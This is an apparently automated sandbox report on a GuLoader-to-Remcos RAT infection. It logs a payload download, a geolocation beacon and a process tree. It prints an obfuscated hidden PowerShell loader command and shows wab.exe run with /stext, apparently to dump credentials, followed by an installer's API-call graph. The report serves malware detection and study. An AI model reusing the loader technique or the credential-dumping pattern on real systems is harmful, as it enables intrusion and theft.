                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: 209.90.237.48
                                                Cache-Control: no-cache
                                                Jul 15, 2024 09:23:55.840049982 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Mon, 15 Jul 2024 04:41:21 GMT
                                                Accept-Ranges: bytes
                                                ETag: "7cb6b83d71d6da1:0"
                                                Server: Microsoft-IIS/10.0
                                                Date: Mon, 15 Jul 2024 07:23:55 GMT
                                                Content-Length: 494656


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.11.30 | 49862 | 178.237.33.50 | 80 | 8740 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jul 15, 2024 09:23:59.758152962 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Jul 15, 2024 09:24:00.086025000 CEST | 1182 | IN | HTTP/1.1 200 OK
                                                date: Mon, 15 Jul 2024 07:23:59 GMT
                                                server: Apache
                                                content-length: 974
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Ascii: { "geoplugin_request":"81.181.54.64", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Los Angeles", "geoplugin_region":"California", "geoplugin_regionCode":"CA", "geoplugin_regionName":"California", "geoplugin_areaCode":"", "geoplugin_dmaCode":"803", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0544", "geoplugin_longitude":"-118.2441", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Target ID:4
                                                Start time:03:23:21
                                                Start date:15/07/2024
                                                Path:C:\Users\user\Desktop\Uundgaaelige.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Uundgaaelige.exe"
                                                Imagebase:0x400000
                                                File size:554'400 bytes
                                                MD5 hash:FC55407CC82612103C5971DCA1837D6B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:7
                                                Start time:03:23:22
                                                Start date:15/07/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)
                                                Imagebase:0x7d0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.216299419557.0000000009A31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:03:23:22
                                                Start date:15/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7d0140000
                                                File size:875'008 bytes
                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:03:23:49
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:03:25:51
                                                Start date:15/07/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424
                                                Imagebase:0x1f0000
                                                File size:482'640 bytes
                                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:23.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.6%
                                                  Total number of Nodes:1302
                                                  Total number of Limit Nodes:41
40140b 2 API calls 3193->3197 3194 403d94 3194->3179 3195->3169 3195->3177 3195->3178 3195->3186 3195->3191 3216 404025 DestroyWindow 3195->3216 3229 40415a 3195->3229 3199 403d9d 3197->3199 3245 404133 3198->3245 3199->3179 3199->3198 3201 403f11 GetDlgItem 3202 403f26 3201->3202 3203 403f2e ShowWindow KiUserCallbackDispatcher 3201->3203 3202->3203 3232 40417c KiUserCallbackDispatcher 3203->3232 3205 403f58 EnableWindow 3210 403f6c 3205->3210 3206 403f71 GetSystemMenu EnableMenuItem SendMessageA 3207 403fa1 SendMessageA 3206->3207 3206->3210 3207->3210 3210->3206 3233 40418f SendMessageA 3210->3233 3234 403c67 3210->3234 3237 406099 lstrcpynA 3210->3237 3212 403fd0 lstrlenA 3213 4060bb 17 API calls 3212->3213 3214 403fe1 SetWindowTextA 3213->3214 3238 401389 3214->3238 3217 40403f CreateDialogParamA 3216->3217 3216->3225 3218 404072 3217->3218 3217->3225 3219 40415a 18 API calls 3218->3219 3220 40407d GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3219->3220 3221 401389 2 API calls 3220->3221 3222 4040c3 3221->3222 3222->3169 3223 4040cb ShowWindow 3222->3223 3224 4041a6 SendMessageA 3223->3224 3224->3225 3225->3169 3225->3183 3227 4041be 3226->3227 3228 4041af SendMessageA 3226->3228 3227->3195 3228->3227 3230 4060bb 17 API calls 3229->3230 3231 404165 SetDlgItemTextA 3230->3231 3231->3201 3232->3205 3233->3210 3235 4060bb 17 API calls 3234->3235 3236 403c75 SetWindowTextA 3235->3236 3236->3210 3237->3212 3240 401390 3238->3240 3239 4013fe 3239->3195 3240->3239 3241 4013cb MulDiv SendMessageA 3240->3241 3241->3240 3243 401389 2 API calls 3242->3243 3244 401420 3243->3244 3244->3198 3246 404140 SendMessageA 3245->3246 3247 40413a 3245->3247 3246->3194 3247->3246 3249 4041d9 GetWindowLongA 3248->3249 3259 404262 3248->3259 3250 4041ea 3249->3250 3249->3259 3251 4041f9 GetSysColor 3250->3251 3252 4041fc 3250->3252 3251->3252 3253 404202 SetTextColor 3252->3253 3254 40420c SetBkMode 3252->3254 3253->3254 3255 404224 GetSysColor 3254->3255 3256 40422a 3254->3256 
3255->3256 3257 404231 SetBkColor 3256->3257 3258 40423b 3256->3258 3257->3258 3258->3259 3260 404255 CreateBrushIndirect 3258->3260 3261 40424e DeleteObject 3258->3261 3259->3169 3260->3259 3261->3260 3279 40330d SetErrorMode GetVersion 3280 40334e 3279->3280 3281 403354 3279->3281 3282 406431 5 API calls 3280->3282 3370 4063c3 GetSystemDirectoryA 3281->3370 3282->3281 3284 40336a lstrlenA 3284->3281 3285 403379 3284->3285 3373 406431 GetModuleHandleA 3285->3373 3288 406431 5 API calls 3289 403387 3288->3289 3290 406431 5 API calls 3289->3290 3291 403393 #17 OleInitialize SHGetFileInfoA 3290->3291 3379 406099 lstrcpynA 3291->3379 3294 4033df GetCommandLineA 3380 406099 lstrcpynA 3294->3380 3296 4033f1 GetModuleHandleA 3297 403408 3296->3297 3298 405a5c CharNextA 3297->3298 3299 40341c CharNextA 3298->3299 3307 40342c 3299->3307 3300 4034f6 3301 403509 GetTempPathA 3300->3301 3381 4032dc 3301->3381 3303 403521 3304 403525 GetWindowsDirectoryA lstrcatA 3303->3304 3305 40357b DeleteFileA 3303->3305 3308 4032dc 12 API calls 3304->3308 3391 402d98 GetTickCount GetModuleFileNameA 3305->3391 3306 405a5c CharNextA 3306->3307 3307->3300 3307->3306 3311 4034f8 3307->3311 3310 403541 3308->3310 3310->3305 3314 403545 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3310->3314 3488 406099 lstrcpynA 3311->3488 3312 40358f 3317 405a5c CharNextA 3312->3317 3353 403615 3312->3353 3365 403625 3312->3365 3316 4032dc 12 API calls 3314->3316 3319 403573 3316->3319 3321 4035aa 3317->3321 3319->3305 3319->3365 3328 4035f0 3321->3328 3329 403655 3321->3329 3322 40375d 3325 403765 GetCurrentProcess OpenProcessToken 3322->3325 3326 4037df ExitProcess 3322->3326 3323 40363f 3514 4057b5 3323->3514 3331 4037b0 3325->3331 3332 403780 LookupPrivilegeValueA AdjustTokenPrivileges 3325->3332 3489 405b1f 3328->3489 3477 405720 3329->3477 3335 406431 5 API calls 3331->3335 3332->3331 3340 4037b7 3335->3340 3338 403676 lstrcatA lstrcmpiA 3344 403692 3338->3344 3338->3365 3339 
40366b lstrcatA 3339->3338 3341 4037cc ExitWindowsEx 3340->3341 3342 4037d8 3340->3342 3341->3326 3341->3342 3345 40140b 2 API calls 3342->3345 3347 403697 3344->3347 3348 40369e 3344->3348 3345->3326 3346 40360a 3504 406099 lstrcpynA 3346->3504 3518 405686 CreateDirectoryA 3347->3518 3523 405703 CreateDirectoryA 3348->3523 3352 4036a3 SetCurrentDirectoryA 3355 4036b2 3352->3355 3356 4036bd 3352->3356 3421 4038e9 3353->3421 3526 406099 lstrcpynA 3355->3526 3480 406099 lstrcpynA 3356->3480 3359 4060bb 17 API calls 3360 4036fc DeleteFileA 3359->3360 3361 403709 CopyFileA 3360->3361 3367 4036cb 3360->3367 3361->3367 3362 403751 3363 405e78 36 API calls 3362->3363 3363->3365 3505 4037f7 3365->3505 3366 4060bb 17 API calls 3366->3367 3367->3359 3367->3362 3367->3366 3369 40373d CloseHandle 3367->3369 3481 405e78 MoveFileExA 3367->3481 3485 405738 CreateProcessA 3367->3485 3369->3367 3371 4063e5 wsprintfA LoadLibraryExA 3370->3371 3371->3284 3374 406457 GetProcAddress 3373->3374 3375 40644d 3373->3375 3377 403380 3374->3377 3376 4063c3 3 API calls 3375->3376 3378 406453 3376->3378 3377->3288 3378->3374 3378->3377 3379->3294 3380->3296 3382 406303 5 API calls 3381->3382 3384 4032e8 3382->3384 3383 4032f2 3383->3303 3384->3383 3527 405a31 lstrlenA CharPrevA 3384->3527 3387 405703 2 API calls 3388 403300 3387->3388 3389 405c61 2 API calls 3388->3389 3390 40330b 3389->3390 3390->3303 3530 405c32 GetFileAttributesA CreateFileA 3391->3530 3393 402ddb 3420 402de8 3393->3420 3531 406099 lstrcpynA 3393->3531 3395 402dfe 3532 405a78 lstrlenA 3395->3532 3399 402e0f GetFileSize 3400 402f10 3399->3400 3418 402e26 3399->3418 3537 402cf9 3400->3537 3404 402f53 GlobalAlloc 3408 402f6a 3404->3408 3405 402fab 3406 402cf9 32 API calls 3405->3406 3406->3420 3412 405c61 2 API calls 3408->3412 3409 402f34 3410 4032af ReadFile 3409->3410 3413 402f3f 3410->3413 3411 402cf9 32 API calls 3411->3418 3414 402f7b CreateFileA 3412->3414 3413->3404 3413->3420 3415 402fb5 3414->3415 3414->3420 3552 
4032c5 SetFilePointer 3415->3552 3417 402fc3 3553 40303e 3417->3553 3418->3400 3418->3405 3418->3411 3418->3420 3568 4032af 3418->3568 3420->3312 3422 406431 5 API calls 3421->3422 3423 4038fd 3422->3423 3424 403903 3423->3424 3425 403915 3423->3425 3619 405ff7 wsprintfA 3424->3619 3426 405f80 3 API calls 3425->3426 3427 403940 3426->3427 3429 40395e lstrcatA 3427->3429 3431 405f80 3 API calls 3427->3431 3430 403913 3429->3430 3604 403bae 3430->3604 3431->3429 3434 405b1f 18 API calls 3435 403990 3434->3435 3436 403a19 3435->3436 3438 405f80 3 API calls 3435->3438 3437 405b1f 18 API calls 3436->3437 3439 403a1f 3437->3439 3440 4039bc 3438->3440 3441 403a2f LoadImageA 3439->3441 3442 4060bb 17 API calls 3439->3442 3440->3436 3445 4039d8 lstrlenA 3440->3445 3449 405a5c CharNextA 3440->3449 3443 403ad5 3441->3443 3444 403a56 RegisterClassA 3441->3444 3442->3441 3448 40140b 2 API calls 3443->3448 3446 403adf 3444->3446 3447 403a8c SystemParametersInfoA CreateWindowExA 3444->3447 3450 4039e6 lstrcmpiA 3445->3450 3451 403a0c 3445->3451 3446->3365 3447->3443 3452 403adb 3448->3452 3453 4039d6 3449->3453 3450->3451 3454 4039f6 GetFileAttributesA 3450->3454 3455 405a31 3 API calls 3451->3455 3452->3446 3458 403bae 18 API calls 3452->3458 3453->3445 3457 403a02 3454->3457 3456 403a12 3455->3456 3620 406099 lstrcpynA 3456->3620 3457->3451 3461 405a78 2 API calls 3457->3461 3459 403aec 3458->3459 3462 403af8 ShowWindow 3459->3462 3463 403b7b 3459->3463 3461->3451 3464 4063c3 3 API calls 3462->3464 3612 405292 OleInitialize 3463->3612 3466 403b10 3464->3466 3470 403b1e GetClassInfoA 3466->3470 3472 4063c3 3 API calls 3466->3472 3467 403b81 3468 403b85 3467->3468 3469 403b9d 3467->3469 3468->3446 3475 40140b 2 API calls 3468->3475 3471 40140b 2 API calls 3469->3471 3473 403b32 GetClassInfoA RegisterClassA 3470->3473 3474 403b48 DialogBoxParamA 3470->3474 3471->3446 3472->3470 3473->3474 3476 40140b 2 API calls 3474->3476 3475->3446 3476->3446 3478 406431 5 API calls 3477->3478 
3479 40365a lstrcatA 3478->3479 3479->3338 3479->3339 3480->3367 3482 405e8c 3481->3482 3484 405e99 3481->3484 3622 405d08 3482->3622 3484->3367 3486 405777 3485->3486 3487 40576b CloseHandle 3485->3487 3486->3367 3487->3486 3488->3301 3656 406099 lstrcpynA 3489->3656 3491 405b30 3657 405aca CharNextA CharNextA 3491->3657 3494 4035fb 3494->3365 3503 406099 lstrcpynA 3494->3503 3495 406303 5 API calls 3501 405b46 3495->3501 3496 405b71 lstrlenA 3497 405b7c 3496->3497 3496->3501 3499 405a31 3 API calls 3497->3499 3498 40639c 2 API calls 3498->3501 3500 405b81 GetFileAttributesA 3499->3500 3500->3494 3501->3494 3501->3496 3501->3498 3502 405a78 2 API calls 3501->3502 3502->3496 3503->3346 3504->3353 3506 403812 3505->3506 3507 403808 CloseHandle 3505->3507 3508 403826 3506->3508 3509 40381c CloseHandle 3506->3509 3507->3506 3663 403854 3508->3663 3509->3508 3516 4057ca 3514->3516 3515 40364d ExitProcess 3516->3515 3517 4057de MessageBoxIndirectA 3516->3517 3517->3515 3519 40369c 3518->3519 3520 4056d7 GetLastError 3518->3520 3519->3352 3520->3519 3521 4056e6 SetFileSecurityA 3520->3521 3521->3519 3522 4056fc GetLastError 3521->3522 3522->3519 3524 405713 3523->3524 3525 405717 GetLastError 3523->3525 3524->3352 3525->3524 3526->3356 3528 4032fa 3527->3528 3529 405a4b lstrcatA 3527->3529 3528->3387 3529->3528 3530->3393 3531->3395 3533 405a85 3532->3533 3534 402e04 3533->3534 3535 405a8a CharPrevA 3533->3535 3536 406099 lstrcpynA 3534->3536 3535->3533 3535->3534 3536->3399 3538 402d07 3537->3538 3539 402d1f 3537->3539 3540 402d10 DestroyWindow 3538->3540 3545 402d17 3538->3545 3541 402d27 3539->3541 3542 402d2f GetTickCount 3539->3542 3540->3545 3572 40646d 3541->3572 3544 402d3d 3542->3544 3542->3545 3546 402d72 CreateDialogParamA ShowWindow 3544->3546 3547 402d45 3544->3547 3545->3404 3545->3420 3571 4032c5 SetFilePointer 3545->3571 3546->3545 3547->3545 3576 402cdd 3547->3576 3549 402d53 wsprintfA 3550 4051c0 24 API calls 3549->3550 3551 402d70 3550->3551 3551->3545 
3552->3417 3554 403069 3553->3554 3555 40304d SetFilePointer 3553->3555 3579 403146 GetTickCount 3554->3579 3555->3554 3558 403106 3558->3420 3561 403146 42 API calls 3562 4030a0 3561->3562 3562->3558 3563 40310c ReadFile 3562->3563 3565 4030af 3562->3565 3563->3558 3565->3558 3566 405caa ReadFile 3565->3566 3594 405cd9 WriteFile 3565->3594 3566->3565 3569 405caa ReadFile 3568->3569 3570 4032c2 3569->3570 3570->3418 3571->3409 3573 40648a PeekMessageA 3572->3573 3574 406480 DispatchMessageA 3573->3574 3575 40649a 3573->3575 3574->3573 3575->3545 3577 402cec 3576->3577 3578 402cee MulDiv 3576->3578 3577->3578 3578->3549 3580 403174 3579->3580 3581 40329e 3579->3581 3596 4032c5 SetFilePointer 3580->3596 3582 402cf9 32 API calls 3581->3582 3584 403070 3582->3584 3584->3558 3592 405caa ReadFile 3584->3592 3585 40317f SetFilePointer 3587 4031a4 3585->3587 3586 4032af ReadFile 3586->3587 3587->3584 3587->3586 3589 402cf9 32 API calls 3587->3589 3590 405cd9 WriteFile 3587->3590 3591 40327f SetFilePointer 3587->3591 3597 406576 3587->3597 3589->3587 3590->3587 3591->3581 3593 403089 3592->3593 3593->3558 3593->3561 3595 405cf7 3594->3595 3595->3565 3596->3585 3598 40659b 3597->3598 3599 4065a3 3597->3599 3598->3587 3599->3598 3600 406633 GlobalAlloc 3599->3600 3601 40662a GlobalFree 3599->3601 3602 4066a1 GlobalFree 3599->3602 3603 4066aa GlobalAlloc 3599->3603 3600->3598 3600->3599 3601->3600 3602->3603 3603->3598 3603->3599 3605 403bc2 3604->3605 3621 405ff7 wsprintfA 3605->3621 3607 403c33 3608 403c67 18 API calls 3607->3608 3610 403c38 3608->3610 3609 40396e 3609->3434 3610->3609 3611 4060bb 17 API calls 3610->3611 3611->3610 3613 4041a6 SendMessageA 3612->3613 3616 4052b5 3613->3616 3614 4052dc 3615 4041a6 SendMessageA 3614->3615 3617 4052ee OleUninitialize 3615->3617 3616->3614 3618 401389 2 API calls 3616->3618 3617->3467 3618->3616 3619->3430 3620->3436 3621->3607 3623 405d54 GetShortPathNameA 3622->3623 3624 405d2e 3622->3624 3626 405e73 3623->3626 3627 405d69 
3623->3627 3649 405c32 GetFileAttributesA CreateFileA 3624->3649 3626->3484 3627->3626 3629 405d71 wsprintfA 3627->3629 3628 405d38 CloseHandle GetShortPathNameA 3628->3626 3630 405d4c 3628->3630 3631 4060bb 17 API calls 3629->3631 3630->3623 3630->3626 3632 405d99 3631->3632 3650 405c32 GetFileAttributesA CreateFileA 3632->3650 3634 405da6 3634->3626 3635 405db5 GetFileSize GlobalAlloc 3634->3635 3636 405dd7 3635->3636 3637 405e6c CloseHandle 3635->3637 3638 405caa ReadFile 3636->3638 3637->3626 3639 405ddf 3638->3639 3639->3637 3651 405b97 lstrlenA 3639->3651 3642 405df6 lstrcpyA 3644 405e18 3642->3644 3643 405e0a 3645 405b97 4 API calls 3643->3645 3646 405e4f SetFilePointer 3644->3646 3645->3644 3647 405cd9 WriteFile 3646->3647 3648 405e65 GlobalFree 3647->3648 3648->3637 3649->3628 3650->3634 3652 405bd8 lstrlenA 3651->3652 3653 405bb1 lstrcmpiA 3652->3653 3654 405be0 3652->3654 3653->3654 3655 405bcf CharNextA 3653->3655 3654->3642 3654->3643 3655->3652 3656->3491 3658 405ae5 3657->3658 3660 405af5 3657->3660 3658->3660 3661 405af0 CharNextA 3658->3661 3659 405b15 3659->3494 3659->3495 3660->3659 3662 405a5c CharNextA 3660->3662 3661->3659 3662->3660 3664 403862 3663->3664 3665 40382b 3664->3665 3666 403867 FreeLibrary GlobalFree 3664->3666 3667 405861 3665->3667 3666->3665 3666->3666 3668 405b1f 18 API calls 3667->3668 3669 405881 3668->3669 3670 4058a0 3669->3670 3671 405889 DeleteFileA 3669->3671 3673 4059d8 3670->3673 3707 406099 lstrcpynA 3670->3707 3672 40362e OleUninitialize 3671->3672 3672->3322 3672->3323 3673->3672 3678 40639c 2 API calls 3673->3678 3675 4058c6 3676 4058d9 3675->3676 3677 4058cc lstrcatA 3675->3677 3680 405a78 2 API calls 3676->3680 3679 4058df 3677->3679 3681 4059f2 3678->3681 3682 4058ed lstrcatA 3679->3682 3683 4058f8 lstrlenA FindFirstFileA 3679->3683 3680->3679 3681->3672 3684 4059f6 3681->3684 3682->3683 3685 4059ce 3683->3685 3705 40591c 3683->3705 3686 405a31 3 API calls 3684->3686 3685->3673 3688 4059fc 3686->3688 3687 
